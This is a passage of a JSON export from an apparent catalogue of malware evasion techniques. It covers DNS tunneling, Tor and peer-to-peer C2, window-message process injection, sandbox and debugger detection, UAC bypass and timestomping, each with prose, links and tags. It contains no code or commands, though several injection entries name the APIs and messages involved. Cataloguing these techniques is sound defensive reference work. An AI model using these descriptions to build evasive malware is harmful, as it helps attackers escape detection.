"resources": "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf",
"creation_date": "2019-04-23T12:02:11Z",
"tags": "Domain generation algorithms (DGAs),\r\nDomain names,\r\nCommand and control servers,\r\nRendez-vous points,\r\nBotnets,\r\nZeus,\r\nAndromeda,\r\nNecurs,\r\nCommunication channels,",
"modification_date": "2023-10-04T10:44:26.439000Z",
"category": [
9
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 140,
"key": "dns-tunneling",
"unprotect_id": "U0905, T1048.003",
"name": "DNS Tunneling",
"description": "DNS tunneling is a technique that uses the Domain Name System (DNS) protocol to transfer data in an encrypted and covert manner. It involves encoding the data of other programs or protocols in DNS queries and responses, and using DNS servers as a means of communication.\r\n\r\nTo carry out DNS tunneling, the attacker typically needs access to a compromised system with external network connectivity and an internal DNS server with network access. The attacker also needs to control a domain and a server that can act as an authoritative DNS server in order to execute the server-side tunneling and data payload programs.\r\n\r\nDNS tunneling can be used for various purposes, such as to control remote servers and applications, transfer data, or bypass firewall restrictions. It can be difficult to detect, as the DNS protocol is commonly used for legitimate purposes and is typically not heavily scrutinized by security systems.",
"resources": "https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/\nhttps://attack.mitre.org/techniques/T1048/003/",
"creation_date": "2019-04-23T12:18:13Z",
"tags": "DNS tunneling,\r\nDomain Name System (DNS),\r\nData transfer,\r\nEncrypted,\r\nCovert,\r\nExternal network connectivity,\r\nAuthoritative DNS server,\r\nServer-side tunneling,",
"modification_date": "2023-10-04T10:45:00.526000Z",
"category": [
9,
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 141,
"key": "dns-hijacking",
"unprotect_id": "U0904, E1643.m01",
"name": "DNS Hijacking",
"description": "DNS hijacking or DNS redirection is a technique used to subvert the normal domain name resolution process. It involves redirecting DNS queries to a rogue DNS server controlled by an attacker, or modifying the behavior of a trusted DNS server so that it does not comply with internet standards. This can be done for various purposes, such as phishing attacks, censorship, or for the self-serving purposes of internet service providers (ISPs) and DNS service providers.\r\n\r\nDNS hijacking can be carried out by malware that modifies a computer's TCP/IP configuration to point to a rogue DNS server. This allows the attacker to redirect the user's internet traffic to malicious websites or to block access to certain websites. It can also be used by ISPs and DNS service providers to redirect users to their own web servers for advertising or other purposes.",
"resources": "https://en.wikipedia.org/wiki/DNS_hijacking",
"creation_date": "2019-04-23T12:20:47Z",
"tags": "DNS hijacking,\r\nDNS redirection,\r\nDomain name system (DNS),\r\nRogue DNS server,\r\nTrusted DNS server,",
"modification_date": "2023-10-04T10:44:26.656000Z",
"category": [
9
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 142,
"key": "tor-network-c2",
"unprotect_id": "U0903",
"name": "Tor Network C2",
"description": "Tor is a free and open-source network that enables anonymous communication. It uses a network of volunteer-operated servers, known as \"relays,\" to route internet traffic in a way that conceals the user's location and usage from surveillance and traffic analysis. By routing traffic through multiple relays, Tor makes it difficult to trace internet activity back to the user.\r\n\r\nMalware can use the Tor network to communicate with a command and control (C&C) server in a way that is harder to detect. Ransomware often uses Tor to host the payment page and even data leak pages. By using the anonymity provided by Tor, the attackers can make it more difficult for authorities to track them down and shut down their operations.",
"resources": "",
"creation_date": "2019-04-23T12:25:04Z",
"tags": "Tor,\r\nAnonymous communication,\r\nInternet traffic,\r\nVolunteer overlay network,\r\nCommand and control (C&C),",
"modification_date": "2023-10-04T10:39:37.409000Z",
"category": [
9
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 143,
"key": "peer-to-peer-c2",
"unprotect_id": "U0902",
"name": "Peer to peer C2",
"description": "Peer-to-peer (P2P) botnets are a type of botnet that uses a decentralized network structure, without a central command and control (C&C) server. Each infected machine in a P2P botnet maintains a list of other trusted computers (including other infected machines), as well as information drop locations and locations where the malware can be updated. Some P2P botnets also use encryption to conceal their communications.\r\n\r\nThe decentralized nature of P2P botnets makes it harder for security researchers to track and disrupt their activities. Without a central C&C server, it is more difficult for investigators to take down the entire network by targeting a single infected machine. Additionally, the use of encryption can hinder analysis of the botnet's communications. However, this decentralized structure also makes it more difficult for the operator to control the botnet and issue commands to the infected machines.",
"resources": "https://www.malwaretech.com/2013/12/peer-to-peer-botnets-for-beginners.html",
"creation_date": "2019-04-23T12:31:10Z",
"tags": "Peer-to-peer (P2P) botnets,\r\nDecentralized network,\r\nCommand and control (C&C),\r\nCentralized structure,\r\nBotnet operator,",
"modification_date": "2023-10-04T10:43:29.377000Z",
"category": [
9
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 144,
"key": "c2-via-social-networks",
"unprotect_id": "U0901",
"name": "C2 via Social Networks",
"description": "Malware often relies on a communication channel with its operator in order to receive instructions and updates. This channel is known as a command and control (C&C or C2) channel. C&C channels can take various forms, such as internet relay chat (IRC), peer-to-peer protocols, and even social media. The use of C&C channels allows the operator to remotely control the malware and direct its actions.",
"resources": "https://zeltser.com/bots-command-and-control-via-social-media/",
"creation_date": "2019-04-23T12:32:22Z",
"tags": "Command and control (C&C),\r\nCommunication channel,\r\nOperator,\r\nInternet relay chat (IRC),\r\nPeer-to-peer protocols,\r\nSocial media,",
"modification_date": "2023-10-04T10:42:48.003000Z",
"category": [
9
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 145,
"key": "malvertising",
"unprotect_id": "U1002",
"name": "Malvertising",
"description": "Malvertising is a type of cyber attack that involves using online advertising as a means to spread malware. This is attractive to attackers because it allows them to easily reach a large number of users without having to directly compromise the websites hosting the ads. The ads themselves can be inserted into reputable and high-profile websites, which can help attackers bypass network security measures and reach users who may not be as vigilant about protecting themselves online. \r\n\r\nBy using malvertising, attackers can exploit the trust that users have in the websites they visit and the ads they see, making it an effective and stealthy way to spread malware.",
"resources": "https://www.imperva.com/learn/application-security/malvertising/",
"creation_date": "2019-04-23T12:35:33Z",
"tags": "malvertising,\r\nonline advertising,\r\nhigh-profile websites,\r\ntrust in websites,",
"modification_date": "2023-10-04T10:43:44.639000Z",
"category": [
14
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 146,
"key": "process-reimaging",
"unprotect_id": "U1210",
"name": "Process Reimaging",
"description": "Process Reimaging is a technique used to evade detection by endpoint security solutions. It is a variation of the Process Hollowing or Process Doppelganging techniques, which are used to execute arbitrary code in the context of another process.\r\n\r\nThe Windows operating system has inconsistencies in how it determines the locations of process image FILE_OBJECTs, which can impact the ability of endpoint security solutions, such as Microsoft Defender Realtime Protection, to accurately detect the correct binaries loaded in malicious processes. This inconsistency can be exploited using the Process Reimaging technique, which does not require code injection.",
"resources": "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/in-ntdll-i-trust-process-reimaging-and-endpoint-security-solution-bypass.html",
"creation_date": "2020-05-08T09:26:00Z",
"tags": "Process Reimaging,\r\nDetection evasion,\r\nEndpoint security solutions,\r\nProcess Hollowing,\r\nProcess Doppelganging,\r\nMitre Attack Defense Evasion Category,\r\nCode injection,",
"modification_date": "2023-10-04T10:43:54.431000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 147,
"key": "api-hammering",
"unprotect_id": "U1305, B0003.012",
"name": "API Hammering",
"description": "API hammering is a technique used to delay sandbox analysis and thus avoid malware capability analysis reporting. This technique consists of calling a large amount of benign APIs like \"printf\" in a loop.",
"resources": "https://www.joesecurity.org/blog/3660886847485093803",
"creation_date": "2020-09-10T14:39:31Z",
"tags": "hammering",
"modification_date": "2023-10-04T10:42:01.978000Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 148,
"key": "rdtscp",
"unprotect_id": "U1304",
"name": "RDTSCP",
"description": "Newer processors support a new instruction called RDTSCP which does the exact same thing as RDTSC, except that it does so serializing (meaning it waits for all instructions to execute before reading the counter. and that the possible reordering of the execution of the instructions is won that does not happen). \r\n\r\nThis instruction can be used to calculate the delta of the timestamp counter in the same way as RDTSC and thus detect whether the program is being debugged, emulated or executed in a virtual environment.",
"resources": "https://www.hexacorn.com/blog/2014/06/15/rdtscp-a-recooked-antire-trick/",
"creation_date": "2020-09-14T07:32:36Z",
"tags": "RDTSCP",
"modification_date": "2023-10-04T10:42:43.229000Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [
364
],
"contributors": []
},
{
"id": 149,
"key": "checking-malware-name",
"unprotect_id": "U1303,U0401",
"name": "Checking Malware Name",
"description": "Malware can use various techniques to evade detection by security analysts and researchers. One such technique is to check the name of the malware sample before fully executing on the infected machine. If the sample has been renamed to a blacklisted name, such as \"malware.exe\" or \"sample.exe\", or even with the file hash, the malware can detect this and change its behavior or terminate its process to avoid being detected and analyzed. This technique allows the malware to remain undetected and continue its malicious activities on the infected machine.",
"resources": "",
"creation_date": "2020-09-22T06:49:06Z",
"tags": "malware,\r\nsample,\r\nblacklisted names,\r\nprocess,\r\nfile hash,",
"modification_date": "2023-10-04T10:40:12.913000Z",
"category": [
1,
6
],
"rules": [
129
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 150,
"key": "thermal-zone-temperature",
"unprotect_id": "U1302",
"name": "Thermal Zone Temperature",
"description": "The temperature sensor is used to know the current temperature of a machine. In a non-virtualized environment, the function returns valid support and output like: \"25.05 C: 77.09 F: 298.2K\". But for a fully virtualized environment, the return is \"MSAcpi_ThermalZoneTemperature not supported\" because this feature is not supported on virtualized processors.\r\n\r\nInterestingly, this method is not valid. Not all Windows machines will support this method due to incompatibility with thermal zone sensors. It is a BIOS function. Sometimes the BIOS manufacturer provides dlls that can be referenced to call the required function and return the details.\r\n\r\nMany malware authors use it to detect virtual machines, but it frequently fails due to lack of vendor support.",
"resources": "https://medium.com/@DebugActiveProcess/anti-vm-techniques-with-msacpi-thermalzonetemperature-32cfeecda802\nhttps://social.msdn.microsoft.com/Forums/en-US/19520825-b1fc-4778-8704-c492124bc029/getting-cpu-temp?forum=vblanguage",
"creation_date": "2020-09-26T10:02:04Z",
"tags": "thermal, temperature",
"modification_date": "2023-10-04T10:43:53.612000Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 151,
"key": "getforegroundwindow",
"unprotect_id": "U1301",
"name": "GetForegroundWindow",
"description": "This technique uses the GetForegroundWindow and Sleep APIs to attempt to evade sandboxes. Many sandboxes do not alter the foreground window like a user would in a normal desktop environment.\r\n\r\nIt accomplishes this by making a call to GetForegroundWindow, which returns a handle to the current window. Then the malware sample will sleep for a short time, followed by another call to GetForegroundWindow. If the foreground window has not changed, the malware assumes it is in a sandbox or analysis virtual machine and will continue this loop until the foreground window changes. If there is no change, the program will loop indefinitely or may make a call to ExitProcess.",
"resources": "https://archive.f-secure.com/weblog/archives/00002810.html",
"creation_date": "2020-10-01T11:39:03Z",
"tags": "GetForegroundWindow",
"modification_date": "2023-10-04T10:42:43.425000Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [
25,
133,
236,
290
],
"contributors": []
},
{
"id": 152,
"key": "bypass-user-account-control",
"unprotect_id": "T1548.002",
"name": "Bypass User Account Control",
"description": "Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\r\n\r\nThe impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.",
"resources": "https://attack.mitre.org/techniques/T1548/002/",
"creation_date": "2020-10-05T06:30:46Z",
"tags": "Defense Evasion,\r\nbypass UAC controls,\r\nMITRE,\r\nprivilege elevation,",
"modification_date": "2023-10-04T10:44:59.068000Z",
"category": [
10
],
"rules": [
24,
38
],
"attachments": [],
"featured_api": [
25
],
"contributors": []
},
{
"id": 153,
"key": "consolewindowclass",
"unprotect_id": "U1209",
"name": "ConsoleWindowClass",
"description": "One method that has been used to achieve process injection is by manipulating the User Data of a window object.\r\n\r\nThe User Data of a window is a small amount of memory that is usually used to store a pointer to a class object. This memory can be set using the `SetWindowLongPtr` API and the GWLP_USERDATA parameter. In the case of the Console Window Host (conhost) process, the User Data of a window is used to store the address of a data structure that contains information about the window's position, dimensions, and object handle, as well as a class object with methods to control the behavior of the console window.\r\n\r\nBy manipulating the User Data of a window object, it may be possible to execute arbitrary code in the context of the process associated with that window.",
"resources": "https://modexp.wordpress.com/2018/09/12/process-injection-user-data/",
"creation_date": "2020-10-05T12:31:17Z",
"tags": "Arbitrary code execution,\r\nContext of another process,\r\nSetWindowLongPtr API,\r\nGWLP_USERDATA parameter,\r\nUser Data of a window,",
"modification_date": "2023-10-04T10:42:33.648000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [
3,
4,
6,
23,
24,
239,
290,
357,
363
],
"contributors": []
},
{
"id": 154,
"key": "treepoline",
"unprotect_id": "U1208",
"name": "Treepoline",
"description": "Tree-view controls are a type of user interface element that is used to display hierarchical data in a graphical user interface (GUI). They are commonly used in Windows applications and allow users to navigate and explore complex data structures.\r\n\r\nTo display its content, a tree-view control must sort the items it shows. The sorting routine for a tree-view control can be controlled and modified using a TVSORTCB structure, which includes a field called lpfnCompare that points to a callback function. This callback function is called anytime a comparison between tree elements is required.\r\n\r\nBy sending a TVM_SORTCHILDRENCB message to a tree-view control, it is possible to specify the callback function that should be used to sort the tree-view's elements. When the tree-view control executes the specified callback function, it is possible to execute arbitrary code or perform other actions. This technique can be used to compromise the host system or cause harm in other ways. It is important to note that manipulating the callback function in this way is likely to be detected by security systems and may result in the host system being compromised.",
"resources": "http://www.hexacorn.com/blog/2019/04/24/treepoline-new-code-injection-technique/\nhttps://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/",
"creation_date": "2020-10-06T05:46:01Z",
"tags": "Tree-view controls,\r\nUser interface element,\r\nHierarchical data,\r\nGraphical user interface (GUI),\r\nWindows applications,\r\nData structures,\r\nItem sorting,\r\nTVSORTCB structure,\r\nlpfnCompare field,",
"modification_date": "2023-10-04T10:44:01.256000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [
3,
4,
6,
23,
24,
239,
290,
363
],
"contributors": []
},
{
"id": 155,
"key": "listplanting",
"unprotect_id": "U1207",
"name": "Listplanting",
"description": "Edit controls are a type of user interface element that allows a user to enter and edit text in a graphical user interface (GUI). They are commonly used in Windows applications and can be embedded directly into a GUI or subclassed as a separate window.\r\n\r\nEdit controls can be set to display text in multiline mode, in which case they use a special callback function called the EditWordBreakProc to handle word wrapping. This callback function is called anytime the control needs to perform an operation related to word wrapping.\r\n\r\nIn addition to the EditWordBreakProc callback function, the ListView control, which is a common GUI element used to display lists of items, can also be customized using certain messages. The LVM_SORTGROUPS message allows the user to specify a callback function that is used to sort the groups in a ListView control. The LVM_INSERTGROUPSORTED message inserts a new group into a ListView control, using the callback function specified in the LVM_SORTGROUPS message to determine the proper position for the new group. The LVM_SORTITEMS message allows the user to specify a callback function that is used to sort the items in a ListView control.\r\n\r\nUsing these messages and callback functions, it is possible to customize the sorting of items and groups in a ListView control to meet the specific needs of an application.",
"resources": "https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/",
"creation_date": "2020-10-06T05:48:52Z",
"tags": "Rich Edit controls,\r\nWindows controls,\r\nMultiline mode,\r\nEditWordBreakProc callback,\r\nWord wrapping,\r\nListView control,\r\nGUI element,\r\nDisplay lists of items,\r\nLVM_SORTGROUPS message,\r\nCallback function,",
"modification_date": "2023-10-04T10:42:33.290000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [
3,
4,
6,
23,
24,
239,
290,
363
],
"contributors": []
},
{
"id": 156,
"key": "oleum",
"unprotect_id": "U1206",
"name": "OLEUM",
"description": "Edit controls are a type of user interface element that allows a user to enter and edit text in a graphical user interface (GUI). They are commonly used in Windows applications and can be embedded directly into a GUI or subclassed as a separate window. Edit controls can be set to display text in multiline mode, in which case they use a special callback function called the EditWordBreakProc to handle word wrapping.\r\n\r\nThe EditWordBreakProc callback function is called anytime the control needs to perform an operation related to word wrapping. In some cases, it may be possible to manipulate this callback function to achieve a desired effect, such as injecting code into the host system.\r\n\r\nOne method that has been used to manipulate the EditWordBreakProc callback function is to send the EM_GETOLECALLBACK message to the edit control window using the SendMessage function. This message is not well documented and can cause the rich edit window to crash if the LPARAM parameter does not point to locally accessible memory. Additionally, the EM_GETOLECALLBACK message does not return a pointer to the IRichEditOleCallback interface as expected, but rather to the IRichEditOle interface. As a result, the EM_SETOLECALLBACK message cannot be used to modify the callback function.\r\n\r\nInstead, it may be possible to modify the IRichEditOle.lpVtbl heap memory, which holds a table of methods that can be called on the IRichEditOle interface. By overwriting the address of one of these methods with the address of the payload, it may be possible to execute the payload when the method is called. In this case, the payload is the GetClipboardData function. It is important to note that manipulating the EditWordBreakProc callback function and modifying heap memory in this way is likely to be detected by security systems and may result in the host system being compromised.",
"resources": "https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/",
"creation_date": "2020-10-13T17:17:35Z",
"tags": "Rich Edit controls,\r\nEditWordBreakProc callback,\r\nWord wrapping,\r\nEM_GETOLECALLBACK message,\r\nSendMessage function,\r\nLPARAM parameter,\r\nLocally accessible memory,\r\nIRichEditOleCallback interface,",
"modification_date": "2023-10-04T10:44:00.867000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [
3,
4,
6,
23,
24,
229,
239,
290,
357,
363
],
"contributors": []
},
{
"id": 157,
"key": "editwordbreakproc",
"unprotect_id": "U1229",
"name": "EditWordBreakProc",
"description": "Edit controls, including Rich Edit controls, are a common type of Windows control found in many applications. They can be embedded directly in the application or as subclassed windows. \r\n\r\nWhen these controls display text in multiline mode, they use a callback function called `EditWordBreakProc`. This function is called every time the control needs to do something related to word wrapping. \r\n\r\nAdditionally, when a Rich Edit control receives the `EM_STREAMIN` message, it uses the information provided in an `EDITSTREAM` structure to transfer data into or out of the control. The `pfnCallback` field of this structure can be used to point to a payload in memory, allowing for the injection of malicious code.",
"resources": "https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/",
"creation_date": "2020-10-13T17:19:34Z",
"tags": "Edit controls, Rich Edit controls, Windows control, multiline mode, EditWordBreakProc callback function, word wrapping, EM_STREAMIN message, EDITSTREAM structure, pfnCallback field,",
"modification_date": "2023-10-04T10:44:38.818000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [
3,
4,
6,
23,
24,
239,
290,
363
],
"contributors": []
},
{
"id": 158,
"key": "wordwarping",
"unprotect_id": "U1204",
"name": "WordWarping",
"description": "Edit controls are a type of user interface element that allows a user to enter and edit text in a graphical user interface (GUI). They are commonly used in Windows applications and can be embedded directly into a GUI or subclassed as a separate window. Edit controls can be set to display text in multiline mode, in which case they use a special callback function called the EditWordBreakProc to handle word wrapping.\r\n\r\nThe `EditWordBreakProc` callback function is called anytime the control needs to perform an operation related to word wrapping. This function can be modified for any window by sending the EM_SETWORDBREAKPROC message to the window. If the window is an edit control or a descendant of an edit control, modifying the `EditWordBreakProc` callback function can cause unexpected behavior.\r\n\r\nOne way to trigger the execution of the `EditWordBreakProc` callback function is to simulate keyboard input using the `SendInput` or `PostMessage` APIs. These APIs allow a program to send input events, such as keystrokes or mouse movements, to a window or application as if they were being generated by a user. If the input events are directed at an edit control or a descendant of an edit control, they may cause the `EditWordBreakProc` callback function to be called.",
"resources": "",
"creation_date": "2020-10-13T17:21:36Z",
"tags": "Rich Edit controls,\r\nWindows controls,\r\nMultiline mode,\r\nEditWordBreakProc callback function,\r\nWord wrapping,\r\nEM_SETWORDBREAKPROC message,",
"modification_date": "2023-10-04T10:39:35.737000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [
3,
4,
6,
23,
24,
134,
239,
290,
363
],
"contributors": []
},
{
"id": 160,
"key": "clipbrdwndclass",
"unprotect_id": "U1203",
"name": "CLIPBRDWNDCLASS",
"description": "CLIPBRDWNDCLASS is a window class that is registered by the Object Linking & Embedding (OLE) library (ole32.dll) to handle clipboard data. When a window of this class is created, it is assigned a number of window properties that store the addresses of various interfaces that are used to process clipboard data. These interfaces include the `ClipboardDataObjectInterface`, `ClipboardRootDataObjectInterface`, and `ClipboardDataObjectInterfaceMTA`.\r\n\r\nOne of these interfaces, the `ClipboardDataObjectInterface`, can be leveraged for code injection. If this interface is set to the address of an IUnknown interface and the clipboard window procedure receives a WM_DESTROYCLIPBOARD message, it will invoke the Release method of the IUnknown interface. This can potentially allow malware to inject code into the host system by manipulating the clipboard data and causing the Release method to be called.\r\n\r\nIt is important to note that the CLIPBRDWNDCLASS window class and the interfaces it uses are private to the OLE library, and are not intended for use by external programs.",
"resources": "https://modexp.wordpress.com/2019/05/24/4066/",
"creation_date": "2020-10-13T17:24:15Z",
"tags": "Object Linking & Embedding (OLE) library,\r\nPrivate clipboard\r\nCLIPBRDWNDCLASS window class,\r\nOLE library,\r\nClipboard data,\r\nClipboardDataObjectInterface,\r\nClipboardRootDataObjectInterface,\r\nClipboardDataObjectInterfaceMTA,",
"modification_date": "2023-10-04T10:43:33.129000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [
3,
4,
6,
23,
24,
239,
290,
363
],
"contributors": []
},
{
"id": 161,
"key": "dns-api-injection",
"unprotect_id": "U1202",
"name": "DNS API Injection",
"description": "DNS API injection is a technique used by malware to evade detection by intercepting and modifying DNS (Domain Name System) requests made by a host system. The technique involves injecting code into the DNS API (Application Programming Interface) of the host system, which is a set of functions and protocols that allow communication with the DNS service. By injecting code into the DNS API, the malware can manipulate DNS requests and responses, potentially redirecting traffic to malicious domains or hiding its own DNS requests from being logged or detected.\r\n\r\nTo carry out DNS API injection, the malware must first locate the address of the dnsapi.dll library in the host system's memory and find the address of the exported `DnsApiHeapReset` function. By parsing the code of this function, the malware can discover the addresses of various callback functions that are used to process DNS requests and responses. The malware can then use the `WriteProcessMemory` function to modify these callbacks, allowing it to intercept and manipulate DNS requests made by the host system.\r\n\r\nSysmon v10, a system monitoring tool, includes a feature that logs DNS queries and maps them to the process name making the request. This can help detect DNS API injection by showing any suspicious or unexpected DNS requests being made by processes on the host system.",
"resources": "https://modexp.wordpress.com/2019/08/08/windows-process-injection-dnsapi/\nhttp://www.hexacorn.com/blog/2019/06/12/code-execution-via-surgical-callback-overwrites-e-g-dns-memory-functions/",
"creation_date": "2020-10-26T07:38:31Z",
"tags": "Overwriting DNS memory functions,\r\nLogging DNS queries,\r\nIntercepting DNS requests,\r\nHiding DNS requests,\r\ndnsapi.dll,\r\nDnsApiHeapReset,",
"modification_date": "2023-10-04T10:44:49.979000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [
2,
3,
4,
6,
23,
24,
94,
239,
290,
301,
357,
358,
363,
413,
423,
469,
480,
569
],
"contributors": []
},
{
"id": 162,
"key": "breaking-badder",
"unprotect_id": "U1201",
"name": "Breaking BaDDEr",
"description": "Dynamic Data Exchange (DDE) is a protocol that allows applications to share data with each other. The Dynamic Data Exchange Management Library (DDEML) is a set of functions that facilitate data sharing using the DDE protocol. DDE and DDEML are commonly used in Microsoft Office to enable data to be shared between applications. In October 2017, a vulnerability was discovered in Microsoft Office that could be exploited using DDE to execute arbitrary code. Since then, DDE has been disabled by default in Microsoft Office and is no longer considered a critical component. \r\n\r\nThis injection method is limited to the explorer.exe process, which is the process that handles graphical user interface (GUI) elements in the Windows operating system.",
"resources": "https://modexp.wordpress.com/2019/08/09/windows-process-injection-breaking-badder/",
"creation_date": "2020-10-26T07:41:58Z",
"tags": "Data sharing protocol,\r\nData sharing library,\r\nDDE protocol,\r\nCode execution,",
"modification_date": "2023-10-04T10:42:33.135000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [
3,
4,
6,
23,
24,
239,
290,
357,
363,
381,
423,
569
],
"contributors": []
},
{
"id": 163,
"key": "anti-yara-rules",
"unprotect_id": "U1001",
"name": "Anti Yara Rules",
"description": "Yara rules are used by malware researchers to identify and classify malware based on specific characteristics and behaviors. These rules are powerful because they allow researchers to quickly and accurately detect malware, even if it has been modified to avoid detection. However, attackers can also modify their malware to avoid detection by Yara rules. \r\n\r\nThis is often seen with ransomware, where attackers will update the content of their ransom notes in an attempt to evade detection. By constantly modifying their malware, attackers can make it more difficult for researchers to track and detect their malware.",
"resources": "https://github.com/Yara-Rules/rules",
"creation_date": "2020-11-10T08:08:48Z",
"tags": "Yara rules,\r\ntracking,\r\ndetection evasion,\r\nransomware notes,\r\nmalware classification,\r\nmalware characteristics,\r\nmalware behaviors,",
"modification_date": "2023-10-04T10:42:42.729000Z",
"category": [
14
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 164,
"key": "debug-registers-hardware-breakpoints",
"unprotect_id": "U0127, B0001.005",
"name": "Debug Registers, Hardware Breakpoints",
"description": "Registers DR0 through DR3 contain the linear address associated with one of the four hardware breakpoint conditions. For anti-debugging, malware will check the contents of the first four debug registers to see if the hardware breakpoint has been set.",
"resources": "https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-getcurrentthread\nhttps://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-getthreadcontext\nhttps://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/registers-window",
"creation_date": "2020-11-13T14:16:40Z",
"tags": "DR0",
"modification_date": "2023-10-04T10:42:28.818000Z",
"category": [
3
],
"rules": [
10
],
"attachments": [],
"featured_api": [
341,
381,
399
],
"contributors": []
},
{
"id": 165,
"key": "indicator-removal-timestomp",
"unprotect_id": "U0303, T1070.006",
"name": "Indicator Removal: Timestomp",
"description": "Timestomping is a technique used by adversaries to modify the timestamps of a file, such as the modify, access, create, and change times. This technique is often used to hide the fact that a file has been modified or created by the adversary, making it more difficult for forensic investigators or file analysis tools to detect the changes. \r\n\r\nBy modifying the timestamps of a file, the adversary can make it appear as if the file has been present on the system for a longer period of time, or that it was last accessed or modified at a different time than it actually was. This can help the adversary avoid detection and continue operating on a compromised system without being detected.",
"resources": "https://attack.mitre.org/techniques/T1070/006/",
"creation_date": "2020-11-13T20:27:25Z",
"tags": "Timestomping,\r\nTimestamp manipulation,\r\nChange times,\r\nForensic investigators,\r\nFile analysis tools,\r\nAPT28,\r\nAPT29,\r\nAPT32,\r\nAPT38,",
"modification_date": "2023-10-04T10:44:15.174000Z",
"category": [
8,
10
],
"rules": [
90
],
"attachments": [],
"featured_api": [
23,
341,
376,
388,
425,
442
],
"contributors": []
},
{
"id": 166,
"key": "execution-guardrails-environmental-keying",
"unprotect_id": "T1480.001",
"name": "Execution Guardrails: Environmental Keying",
"description": "Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of Execution Guardrails that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.\r\n\r\nValues can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses. By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult. These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).\r\n\r\nSimilar to Obfuscated Files or Information, adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution. By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult. This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.\r\n\r\nLike other Execution Guardrails, environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical Virtualization/Sandbox Evasion. While use of Virtualization/Sandbox Evasion may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.",
"resources": "https://attack.mitre.org/techniques/T1480/001/",
"creation_date": "2020-11-15T09:35:38Z",
"tags": "Defense Evasion.\r\ncryptography,\r\nconstrain execution,\r\nderiving encryption/decryption keys,\r\nencrypted payloads,\r\nAPT41,\r\nData Protection API",
"modification_date": "2023-10-04T10:44:56.962000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 167,
"key": "file-melt",
"unprotect_id": "U1007",
"name": "File Melt",
"description": "File melting is a technique that malware uses to delete itself after it has been installed on a system. This is often done in order to avoid detection by antivirus programs or other security measures. The process of file melting involves overwriting the file with random data, making it impossible to recover the original file or to detect the presence of the malware. \r\n\r\nThis technique is often used in combination with other tactics, such as hiding the infected file in a remote location or using encryption to make it difficult to access.",
"resources": "",
"creation_date": "2021-02-20T19:02:54Z",
"tags": "File melting,\r\nFile deletion,\r\nOverwriting,\r\nRandom data,\r\nRecovery,\r\nEncryption,\r\nHiding,\r\nRemove trace,",
"modification_date": "2022-12-13T22:56:23.230000Z",
"category": [
14
],
"rules": [
51,
91
],
"attachments": [],
"featured_api": [
1,
3,
4,
6,
8,
11,
12,
23,
25,
132,
341,
363,
364,
381,
419,
425,
450
],
"contributors": []
},
{
"id": 168,
"key": "detecting-online-sandbox",
"unprotect_id": "U1338",
"name": "Detecting Online Sandbox",
